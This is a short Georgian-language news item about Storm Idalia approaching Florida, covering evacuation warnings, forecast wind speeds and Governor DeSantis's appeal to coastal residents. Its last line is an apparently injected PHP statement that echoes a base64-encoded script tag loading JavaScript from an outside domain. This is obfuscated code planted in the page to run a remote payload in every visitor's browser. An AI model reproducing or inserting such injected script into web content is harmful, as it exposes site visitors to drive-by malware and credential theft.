celsiusi
ავერსი შნაიდერი

ფლორიდის შტატში შტორმისთვის ემზადებიან. შტორმი „იდალია“ კუბას უკვე გასცდა და ფლორიდის მექსიკის ყურეს უახლოვდება.

როგორც სინოპტიკოსები პროგნოზირებენ, შტორმი აშშ-ის ტერიტორიას ოთხშაბათს დილით დაატყდება თავს, როგორც მესამე კატეგორიის სიმძლავრის ქარიშხალი.

შტორმისა და მოსალოდნელი წყალდიდობის შესახებ გაფრთხილება ფლორიდის 14 მილიონმა მცხოვრებმა მიიღო. როგორც მოსალოდნელია, ქარის სიჩქარე საათში 179 კილომეტრი იქნება. ფლორიდის გუბერნატორი რონ დესანტისი სანაპირო რაიონების მოსახლეობას აფრთხილებს, რომ მზად იყვნენ ევაკუაციისთვის.

656
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");